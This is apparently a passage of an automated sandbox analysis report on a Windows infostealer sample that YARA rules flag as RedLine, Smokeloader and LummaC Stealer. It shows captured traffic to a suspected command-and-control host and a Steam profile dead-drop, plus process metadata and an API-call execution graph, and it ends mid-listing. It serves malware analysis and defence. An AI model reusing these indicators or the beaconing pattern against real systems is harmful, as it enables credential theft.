                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                        Content-Length: 8
                                                                                                                                                                                                                                                                        Host: deafeninggeh.biz
                                                                                                                                                                                                                                                                        2024-12-14 13:08:33 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                                                                                                                                                                        Data Ascii: act=life
                                                                                                                                                                                                                                                                        2024-12-14 13:08:35 UTC1010INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Date: Sat, 14 Dec 2024 13:08:35 GMT
                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Set-Cookie: PHPSESSID=hdvsrgtrl62c143g9miq3dlj09; expires=Wed, 09-Apr-2025 06:55:13 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nC7h7PFTro%2B6hXeCMAU1FJHmZbCOKADSRJkm5GxY89LorFQ7eXhBgkXguXKNVJ96RlZf%2BQPu5QJVIUfmB7vY6zYg6jFy8qtdAy3Ym234ob3nudXABTT8iMmHU5k6vh%2BUr5lW"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                                                        CF-RAY: 8f1e6c5d9b2572a4-EWR
                                                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1961&min_rtt=1955&rtt_var=746&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2839&recv_bytes=907&delivery_rate=1455633&cwnd=207&unsent_bytes=0&cid=3bdd4d4dce0005bb&ts=2253&x=0"
                                                                                                                                                                                                                                                                        2024-12-14 13:08:35 UTC15INData Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: aerror #D12
                                                                                                                                                                                                                                                                        2024-12-14 13:08:35 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                        3192.168.2.1149754104.102.49.2544437976C:\Users\user\AppData\Local\Temp\3247.tmp.exe
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2024-12-14 13:08:37 UTC219OUTGET /profiles/76561199724331900 HTTP/1.1
                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                        Host: steamcommunity.com
                                                                                                                                                                                                                                                                        2024-12-14 13:08:38 UTC1905INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                        Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED]
                                                                                                                                                                                                                                                                        Expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                        Date: Sat, 14 Dec 2024 13:08:38 GMT
                                                                                                                                                                                                                                                                        Content-Length: 35131
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Set-Cookie: sessionid=823712327b42f853acafd544; Path=/; Secure; SameSite=None
                                                                                                                                                                                                                                                                        Set-Cookie: steamCountry=US%7C185ce35c568ebbb18a145d0cabae7186; Path=/; Secure; HttpOnly; SameSite=None
                                                                                                                                                                                                                                                                        2024-12-14 13:08:38 UTC14479INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0a 09 09 3c 74 69 74 6c 65 3e
                                                                                                                                                                                                                                                                        Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><title>
                                                                                                                                                                                                                                                                        2024-12-14 13:08:39 UTC16384INData Raw: 6d 75 6e 69 74 79 2e 63 6f 6d 2f 3f 73 75 62 73 65 63 74 69 6f 6e 3d 62 72 6f 61 64 63 61 73 74 73 22 3e 0a 09 09 09 09 09 09 42 72 6f 61 64 63 61 73 74 73 09 09 09 09 09 09 09 09 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 6d 65 6e 75 69 74 65 6d 20 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 6f 72 65 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 61 62 6f 75 74 2f 22 3e 0a 09 09 09 09 41 62 6f 75 74 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 6d 65 6e 75 69 74 65 6d 20 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 68 65 6c 70 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 65 6e 2f 22 3e 0a 09 09 09 09 53 55
                                                                                                                                                                                                                                                                        Data Ascii: munity.com/?subsection=broadcasts">Broadcasts</a></div><a class="menuitem " href="https://store.steampowered.com/about/">About</a><a class="menuitem " href="https://help.steampowered.com/en/">SU
                                                                                                                                                                                                                                                                        2024-12-14 13:08:39 UTC3768INData Raw: 09 09 09 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 72 6f 66 69 6c 65 5f 68 65 61 64 65 72 5f 61 63 74 69 6f 6e 73 22 3e 0a 09 09 09 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 3c 2f 64 69 76 3e 0a 0a 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 72 6f 66 69 6c 65 5f 68 65 61 64 65 72 5f 73 75 6d 6d 61 72 79 22 3e 0a 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 65 72 73 6f 6e 61 5f 6e 61 6d 65 20 70 65 72 73 6f 6e 61 5f 6e 61 6d 65 5f 73 70 61 63 65 72 22 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 34 70 78 3b 22 3e 0a 09 09 09 09 09 09 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 61 63 74 75 61 6c 5f 70 65 72
                                                                                                                                                                                                                                                                        Data Ascii: </a></div><div class="profile_header_actions"></div></div><div class="profile_header_summary"><div class="persona_name persona_name_spacer" style="font-size: 24px;"><span class="actual_per
                                                                                                                                                                                                                                                                        2024-12-14 13:08:39 UTC500INData Raw: 20 53 75 62 73 63 72 69 62 65 72 20 41 67 72 65 65 6d 65 6e 74 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 26 6e 62 73 70 3b 7c 20 26 6e 62 73 70 3b 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 73 74 6f 72 65 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 61 63 63 6f 75 6e 74 2f 63 6f 6f 6b 69 65 70 72 65 66 65 72 65 6e 63 65 73 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 43 6f 6f 6b 69 65 73 3c 2f 61 3e 0a 09 09 09 09 09 09 3c 2f 73 70 61 6e 3e 0a 09 09 09 09 09 09 09 09 09 3c 2f 73 70 61 6e 3e 0a 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 72 65 73 70 6f 6e 73 69 76 65 5f 6f 70 74 69 6e 5f 6c 69 6e 6b 22 3e 0a 09 09 09 09 3c 64 69 76
                                                                                                                                                                                                                                                                        Data Ascii: Subscriber Agreement</a> &nbsp;| &nbsp;<a href="http://store.steampowered.com/account/cookiepreferences/" target="_blank">Cookies</a></span></span></div><div class="responsive_optin_link"><div


                                                                                                                                                                                                                                                                        Statistics

                                                                                                                                                                                                                                                                        CPU Usage

                                                                                                                                                                                                                                                                        Click to jump to process

                                                                                                                                                                                                                                                                        Memory Usage

                                                                                                                                                                                                                                                                        Click to jump to process

                                                                                                                                                                                                                                                                        High Level Behavior Distribution

                                                                                                                                                                                                                                                                        Click to dive into process behavior distribution

                                                                                                                                                                                                                                                                        Behavior

                                                                                                                                                                                                                                                                        Click to jump to process

                                                                                                                                                                                                                                                                        System Behavior

                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                        Target ID:0
                                                                                                                                                                                                                                                                        Start time:08:08:14
                                                                                                                                                                                                                                                                        Start date:14/12/2024
                                                                                                                                                                                                                                                                        Path:C:\Users\user\Desktop\XIaCqh1vRm.exe
                                                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                                                        Commandline:"C:\Users\user\Desktop\XIaCqh1vRm.exe"
                                                                                                                                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                                                                                                                                        File size:429'568 bytes
                                                                                                                                                                                                                                                                        MD5 hash:E94835B4D3D35D99400DFD68FE580197
                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                                                                                                        • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.3744559508.0000000000A09000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                                                        • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.3746353673.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                        Target ID:3
                                                                                                                                                                                                                                                                        Start time:08:08:22
                                                                                                                                                                                                                                                                        Start date:14/12/2024
                                                                                                                                                                                                                                                                        Path:C:\Users\user\AppData\Local\Temp\3247.tmp.exe
                                                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                                                        Commandline:"C:\Users\user\AppData\Local\Temp\3247.tmp.exe"
                                                                                                                                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                                                                                                                                        File size:361'984 bytes
                                                                                                                                                                                                                                                                        MD5 hash:D88E2431ABAC06BDF0CD03C034B3E5E3
                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                                                                                                        • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000003.00000002.1856198890.0000000000BD9000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                                                        • Rule: JoeSecurity_LummaCStealer_4, Description: Yara detected LummaC Stealer, Source: 00000003.00000003.1414275987.0000000000B30000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                        • Rule: JoeSecurity_LummaCStealer_4, Description: Yara detected LummaC Stealer, Source: 00000003.00000002.1855825819.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                        • Rule: JoeSecurity_LummaCStealer_4, Description: Yara detected LummaC Stealer, Source: 00000003.00000002.1856080903.0000000000AE0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                        • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000003.00000002.1856080903.0000000000AE0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                                                        Antivirus matches:
                                                                                                                                                                                                                                                                        • Detection: 100%, Avira
                                                                                                                                                                                                                                                                        • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                                                                                        • Detection: 42%, ReversingLabs
                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                        Target ID:7
                                                                                                                                                                                                                                                                        Start time:08:08:39
                                                                                                                                                                                                                                                                        Start date:14/12/2024
                                                                                                                                                                                                                                                                        Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                                                        Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7976 -s 1724
                                                                                                                                                                                                                                                                        Imagebase:0x420000
                                                                                                                                                                                                                                                                        File size:483'680 bytes
                                                                                                                                                                                                                                                                        MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                        Disassembly

                                                                                                                                                                                                                                                                        Reset < >

                                                                                                                                                                                                                                                                          Execution Graph

                                                                                                                                                                                                                                                                          Execution Coverage:2.1%
                                                                                                                                                                                                                                                                          Dynamic/Decrypted Code Coverage:3.8%
                                                                                                                                                                                                                                                                          Signature Coverage:5.8%
                                                                                                                                                                                                                                                                          Total number of Nodes:744
                                                                                                                                                                                                                                                                          Total number of Limit Nodes:21
                                                                                                                                                                                                                                                                          execution_graph 64813 402c04 InternetOpenW 64814 402e55 64813->64814 64817 402c37 ListArray 64813->64817 64834 40f8cf 64814->64834 64816 402e64 64825 42defd 64817->64825 64820 42defd std::_Locinfo::_Locinfo_dtor 26 API calls 64821 402e17 64820->64821 64822 42defd std::_Locinfo::_Locinfo_dtor 26 API calls 64821->64822 64823 402e29 InternetOpenUrlW 64822->64823 64823->64814 64824 402e44 InternetCloseHandle InternetCloseHandle 64823->64824 64824->64814 64827 42df0c 64825->64827 64828 42df1a 64825->64828 64827->64828 64832 42df4a 64827->64832 64841 42eac9 20 API calls __dosmaperr 64828->64841 64829 42df24 64842 42a59d 26 API calls _Deallocate 64829->64842 64831 402e09 64831->64820 64832->64831 64843 42eac9 20 API calls __dosmaperr 64832->64843 64835 40f8d8 64834->64835 64836 40f8da IsProcessorFeaturePresent 64834->64836 64835->64816 64838 40f94d 64836->64838 64844 40f911 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 64838->64844 64840 40fa30 64840->64816 64841->64829 64842->64831 64843->64829 64844->64840 64845 249003c 64846 2490049 64845->64846 64860 2490e0f SetErrorMode SetErrorMode 64846->64860 64851 2490265 64852 24902ce VirtualProtect 64851->64852 64854 249030b 64852->64854 64853 2490439 VirtualFree 64857 24905f4 LoadLibraryA 64853->64857 64859 24904be 64853->64859 64854->64853 64855 24904e3 LoadLibraryA 64855->64859 64858 24908c7 64857->64858 64859->64855 64859->64857 64861 2490223 64860->64861 64862 2490d90 64861->64862 64863 2490dad 64862->64863 64864 2490dbb GetPEB 64863->64864 64865 2490238 VirtualAlloc 64863->64865 64864->64865 64865->64851 64866 40fc06 64867 40fc12 ___BuildCatchObject 64866->64867 64895 40fff3 64867->64895 64869 40fc19 64870 40fd6c 64869->64870 64873 40fc43 64869->64873 64916 4104d3 4 API calls 2 library calls 64870->64916 64872 40fd73 64917 42ffc9 28 API calls _Atexit 64872->64917 64882 40fc82 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 64873->64882 64910 42fcee 5 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 64873->64910 64875 40fd79 64918 42ff7b 28 API calls _Atexit 64875->64918 64878 40fd81 64879 40fc5c 64880 40fc62 64879->64880 64911 42fc92 5 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 64879->64911 64885 40fce3 64882->64885 64912 42a366 167 API calls 3 library calls 64882->64912 64906 4105ed 64885->64906 64886 40fce9 64887 40fcfe 64886->64887 64913 410623 GetModuleHandleW 64887->64913 64889 40fd05 64889->64872 64890 40fd09 64889->64890 64891 40fd12 64890->64891 64914 42ff6c 28 API calls _Atexit 64890->64914 64915 410182 13 API calls 2 library calls 64891->64915 64894 40fd1a 64894->64880 64896 40fffc 64895->64896 64919 41077b IsProcessorFeaturePresent 64896->64919 64898 410008 64920 428827 10 API calls 3 library calls 64898->64920 64900 41000d 64901 410011 64900->64901 64921 4317a1 IsProcessorFeaturePresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 64900->64921 64901->64869 64903 41001a 64904 410028 64903->64904 64922 428850 8 API calls 3 library calls 64903->64922 64904->64869 64923 426830 64906->64923 64909 410613 64909->64886 64910->64879 64911->64882 64912->64885 64913->64889 64914->64891 64915->64894 64916->64872 64917->64875 64918->64878 64919->64898 64920->64900 64921->64903 64922->64901 64924 410600 GetStartupInfoW 64923->64924 64924->64909 64925 432785 64930 432553 64925->64930 64928 4327ad 64935 43257e 64930->64935 64932 432771 64949 42a59d 26 API calls _Deallocate 64932->64949 64934 4326d0 64934->64928 64942 43d01c 64934->64942 64938 4326c7 64935->64938 64945 43c8ce 170 API calls 2 library calls 64935->64945 64937 432711 64937->64938 64946 43c8ce 170 API calls 2 library calls 64937->64946 64938->64934 64948 42eac9 20 API calls __dosmaperr 64938->64948 64940 432730 64940->64938 64947 43c8ce 170 API calls 2 library calls 64940->64947 64950 43c9f1 64942->64950 64944 43d037 64944->64928 64945->64937 64946->64940 64947->64938 64948->64932 64949->64934 64953 43c9fd ___BuildCatchObject 64950->64953 64951 43ca0b 64968 42eac9 20 API calls __dosmaperr 64951->64968 64953->64951 64955 43ca44 64953->64955 64954 43ca10 64969 42a59d 26 API calls _Deallocate 64954->64969 64961 43cfcb 64955->64961 64960 43ca1a __fread_nolock 64960->64944 64971 43f941 64961->64971 64967 43ca68 64970 43ca91 LeaveCriticalSection __wsopen_s 64967->64970 64968->64954 64969->64960 64970->64960 64972 43f964 64971->64972 64973 43f94d 64971->64973 64975 43f983 64972->64975 64976 43f96c 64972->64976 65046 42eac9 20 API calls __dosmaperr 64973->65046 65050 434faa 10 API calls 2 library calls 64975->65050 65048 42eac9 20 API calls __dosmaperr 64976->65048 64977 43f952 65047 42a59d 26 API calls _Deallocate 64977->65047 64981 43f971 65049 42a59d 26 API calls _Deallocate 64981->65049 64982 43f98a MultiByteToWideChar 64983 43f9b9 64982->64983 64984 43f9a9 GetLastError 64982->64984 65052 4336a7 21 API calls 3 library calls 64983->65052 65051 42ea93 20 API calls __dosmaperr 64984->65051 64988 43cfe1 64988->64967 64995 43d03c 64988->64995 64989 43f9c1 64990 43f9e9 64989->64990 64991 43f9c8 MultiByteToWideChar 64989->64991 64993 43346a _free 20 API calls 64990->64993 64991->64990 64992 43f9dd GetLastError 64991->64992 65053 42ea93 20 API calls __dosmaperr 64992->65053 64993->64988 65054 43cd9f 64995->65054 64998 43d087 65001 43d095 64998->65001 65002 43d0ac 64998->65002 64999 43d06e 65073 42eab6 20 API calls __dosmaperr 64999->65073 65075 42eab6 20 API calls __dosmaperr 65001->65075 65072 43cd0a CreateFileW 65002->65072 65006 43d009 65040 43346a 65006->65040 65007 43d09a 65076 42eac9 20 API calls __dosmaperr 65007->65076 65009 43d162 GetFileType 65010 43d1b4 65009->65010 65011 43d16d GetLastError 65009->65011 65081 4396c7 21 API calls 2 library calls 65010->65081 65079 42ea93 20 API calls __dosmaperr 65011->65079 65012 43d073 65074 42eac9 20 API calls __dosmaperr 65012->65074 65013 43d137 GetLastError 65078 42ea93 20 API calls __dosmaperr 65013->65078 65016 43d0e5 65016->65009 65016->65013 65077 43cd0a CreateFileW 65016->65077 65017 43d17b CloseHandle 65017->65012 65021 43d1a4 65017->65021 65020 43d12a 65020->65009 65020->65013 65080 42eac9 20 API calls __dosmaperr 65021->65080 65022 43d1d5 65024 43d221 65022->65024 65082 43cf1b 169 API calls 3 library calls 65022->65082 65029 43d24e 65024->65029 65083 43cabd 167 API calls 4 library calls 65024->65083 65025 43d1a9 65025->65012 65028 43d247 65028->65029 65030 43d25f 65028->65030 65084 4335cd 29 API calls 2 library calls 65029->65084 65030->65006 65032 43d2dd CloseHandle 65030->65032 65085 43cd0a CreateFileW 65032->65085 65034 43d308 65035 43d312 GetLastError 65034->65035 65039 43d257 65034->65039 65086 42ea93 20 API calls __dosmaperr 65035->65086 65037 43d31e 65087 439890 21 API calls 2 library calls 65037->65087 65039->65006 65041 43349e __dosmaperr 65040->65041 65042 433475 HeapFree 65040->65042 65041->64967 65042->65041 65043 43348a 65042->65043 65103 42eac9 20 API calls __dosmaperr 65043->65103 65045 433490 GetLastError 65045->65041 65046->64977 65047->64988 65048->64981 65049->64988 65050->64982 65051->64988 65052->64989 65053->64990 65055 43cdc0 65054->65055 65061 43cdda 65054->65061 65055->65061 65095 42eac9 20 API calls __dosmaperr 65055->65095 65058 43cdcf 65096 42a59d 26 API calls _Deallocate 65058->65096 65060 43ce12 65062 43ce41 65060->65062 65097 42eac9 20 API calls __dosmaperr 65060->65097 65088 43cd2f 65061->65088 65069 43ce94 65062->65069 65099 42ffdf 26 API calls 2 library calls 65062->65099 65065 43ce8f 65067 43cf0e 65065->65067 65065->65069 65066 43ce36 65098 42a59d 26 API calls _Deallocate 65066->65098 65100 42a5ca 11 API calls _Atexit 65067->65100 65069->64998 65069->64999 65071 43cf1a 65072->65016 65073->65012 65074->65006 65075->65007 65076->65012 65077->65020 65078->65012 65079->65017 65080->65025 65081->65022 65082->65024 65083->65028 65084->65039 65085->65034 65086->65037 65087->65039 65090 43cd47 65088->65090 65089 43cd62 65089->65060 65090->65089 65101 42eac9 20 API calls __dosmaperr 65090->65101 65092 43cd86 65102 42a59d 26 API calls _Deallocate 65092->65102 65094 43cd91 65094->65060 65095->65058 65096->65061 65097->65066 65098->65062 65099->65065 65100->65071 65101->65092 65102->65094 65103->65045 65104 43410a 65105 434116 ___BuildCatchObject 65104->65105 65106 434122 65105->65106 65107 434139 65105->65107 65138 42eac9 20 API calls __dosmaperr 65106->65138 65117 42caff EnterCriticalSection 65107->65117 65110 434149 65118 434186 65110->65118 65111 434127 65139 42a59d 26 API calls _Deallocate 65111->65139 65114 434155 65140 43417c LeaveCriticalSection __fread_nolock 65114->65140 65116 434132 __fread_nolock 65117->65110 65119 434194 65118->65119 65120 4341ae 65118->65120 65151 42eac9 20 API calls __dosmaperr 65119->65151 65141 432908 65120->65141 65123 434199 65152 42a59d 26 API calls _Deallocate 65123->65152 65124 4341b7 65148 4347d3 65124->65148 65128 4342bb 65130 4342c8 65128->65130 65134 43426e 65128->65134 65129 43423f 65132 43425c 65129->65132 65129->65134 65154 42eac9 20 API calls __dosmaperr 65130->65154 65153 43449f 31 API calls 4 library calls 65132->65153 65135 4341a4 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 65134->65135 65155 43431b 30 API calls 2 library calls 65134->65155 65135->65114 65136 434266 65136->65135 65138->65111 65139->65116 65140->65116 65142 432914 65141->65142 65143 432929 65141->65143 65156 42eac9 20 API calls __dosmaperr 65142->65156 65143->65124 65145 432919 65157 42a59d 26 API calls _Deallocate 65145->65157 65147 432924 65147->65124 65158 434650 65148->65158 65150 4341d3 65150->65128 65150->65129 65150->65135 65151->65123 65152->65135 65153->65136 65154->65135 65155->65135 65156->65145 65157->65147 65159 43465c ___BuildCatchObject 65158->65159 65160 434664 65159->65160 65161 43467c 65159->65161 65193 42eab6 20 API calls __dosmaperr 65160->65193 65162 434730 65161->65162 65168 4346b4 65161->65168 65198 42eab6 20 API calls __dosmaperr 65162->65198 65164 434669 65194 42eac9 20 API calls __dosmaperr 65164->65194 65167 434735 65199 42eac9 20 API calls __dosmaperr 65167->65199 65183 4396a4 EnterCriticalSection 65168->65183 65169 434671 __fread_nolock 65169->65150 65172 43473d 65200 42a59d 26 API calls _Deallocate 65172->65200 65173 4346ba 65175 4346f3 65173->65175 65176 4346de 65173->65176 65184 434755 65175->65184 65195 42eac9 20 API calls __dosmaperr 65176->65195 65179 4346ee 65197 434728 LeaveCriticalSection __wsopen_s 65179->65197 65180 4346e3 65196 42eab6 20 API calls __dosmaperr 65180->65196 65183->65173 65201 439921 65184->65201 65186 434767 65187 434780 SetFilePointerEx 65186->65187 65188 43476f 65186->65188 65190 434798 GetLastError 65187->65190 65192 434774 65187->65192 65214 42eac9 20 API calls __dosmaperr 65188->65214 65215 42ea93 20 API calls __dosmaperr 65190->65215 65192->65179 65193->65164 65194->65169 65195->65180 65196->65179 65197->65169 65198->65167 65199->65172 65200->65169 65202 43992e 65201->65202 65206 439943 65201->65206 65216 42eab6 20 API calls __dosmaperr 65202->65216 65205 439933 65217 42eac9 20 API calls __dosmaperr 65205->65217 65209 439968 65206->65209 65218 42eab6 20 API calls __dosmaperr 65206->65218 65207 439973 65219 42eac9 20 API calls __dosmaperr 65207->65219 65209->65186 65211 43993b 65211->65186 65212 43997b 65220 42a59d 26 API calls _Deallocate 65212->65220 65214->65192 65215->65192 65216->65205 65217->65211 65218->65207 65219->65212 65220->65211 65221 4332de 65222 4332eb 65221->65222 65226 433303 65221->65226 65271 42eac9 20 API calls __dosmaperr 65222->65271 65224 4332f0 65272 42a59d 26 API calls _Deallocate 65224->65272 65227 43335e 65226->65227 65235 4332fb 65226->65235 65273 434ccd 21 API calls 2 library calls 65226->65273 65229 432908 __fread_nolock 26 API calls 65227->65229 65230 433376 65229->65230 65241 432e16 65230->65241 65232 43337d 65233 432908 __fread_nolock 26 API calls 65232->65233 65232->65235 65234 4333a9 65233->65234 65234->65235 65236 432908 __fread_nolock 26 API calls 65234->65236 65237 4333b7 65236->65237 65237->65235 65238 432908 __fread_nolock 26 API calls 65237->65238 65239 4333c7 65238->65239 65240 432908 __fread_nolock 26 API calls 65239->65240 65240->65235 65242 432e22 ___BuildCatchObject 65241->65242 65243 432e42 65242->65243 65244 432e2a 65242->65244 65245 432f08 65243->65245 65249 432e7b 65243->65249 65340 42eab6 20 API calls __dosmaperr 65244->65340 65347 42eab6 20 API calls __dosmaperr 65245->65347 65248 432e2f 65341 42eac9 20 API calls __dosmaperr 65248->65341 65253 432e8a 65249->65253 65254 432e9f 65249->65254 65250 432f0d 65348 42eac9 20 API calls __dosmaperr 65250->65348 65252 432e37 __fread_nolock 65252->65232 65342 42eab6 20 API calls __dosmaperr 65253->65342 65274 4396a4 EnterCriticalSection 65254->65274 65258 432e8f 65343 42eac9 20 API calls __dosmaperr 65258->65343 65259 432ea5 